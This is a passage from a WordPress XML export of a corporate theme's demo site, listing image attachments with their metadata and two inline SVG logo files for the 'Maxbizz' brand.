		<wp:post_id>2098</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 10:14:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 10:14:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bannner-widget-home4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bannner-widget-home4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bannner-widget-home4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:300;s:4:"file";s:32:"2020/11/bannner-widget-home4.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"bannner-widget-home4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>author-widget</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/author-widget/</link>
		<pubDate>Thu, 12 Nov 2020 10:16:30 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/author-widget.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2099</wp:post_id>
		<wp:post_date><![CDATA[2020-11-12 10:16:30]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-12 10:16:30]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[author-widget]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/author-widget.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/author-widget.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:150;s:6:"height";i:150;s:4:"file";s:25:"2020/11/author-widget.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-mobile/04_white/</link>
		<pubDate>Fri, 13 Nov 2020 07:11:25 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2102</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:11:25]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:11:25]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>77</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/05/04_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#C0FFBF"></stop>
	<stop offset="1" style="stop-color:#55BB53"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>favicon-green</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/favicon-green/</link>
		<pubDate>Wed, 02 Dec 2020 10:17:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/favicon-green.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2135</wp:post_id>
		<wp:post_date><![CDATA[2020-12-02 10:17:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-02 10:17:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[favicon-green]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/favicon-green.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/favicon-green.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:44;s:6:"height";i:44;s:4:"file";s:25:"2020/12/favicon-green.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/04_black/</link>
		<pubDate>Mon, 28 Dec 2020 07:32:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2223</wp:post_id>
		<wp:post_date><![CDATA[2020-12-28 07:32:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-28 07:32:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/04_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop  offset="2.012780e-07" style="stop-color:#C0FFBF"/>
	<stop  offset="1" style="stop-color:#55BB53"/>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1
	s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0
	c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2
	c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4
	c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2
	c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4
	c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4
	c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1
	c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2
	c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2
	c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6
	c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7
	c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1
	c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5
	C40.4,20.6,40.4,20.5,40.4,20.3z"/>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5
		c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3
		c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1
		c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"/>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2
		c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3
		c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"/>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19
		C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9
		c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z
		 M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7
		C88.8,5.7,89.1,5.5,89.5,5.5z"/>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1
		c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2
		c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7
		c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1
		c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5
		c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"/>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7
		c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"/>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"/>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"/>
</g>
</svg>
]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/?elementor_library=default-kit</link>
		<pubDate>Mon, 09 Nov 2020 04:39:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
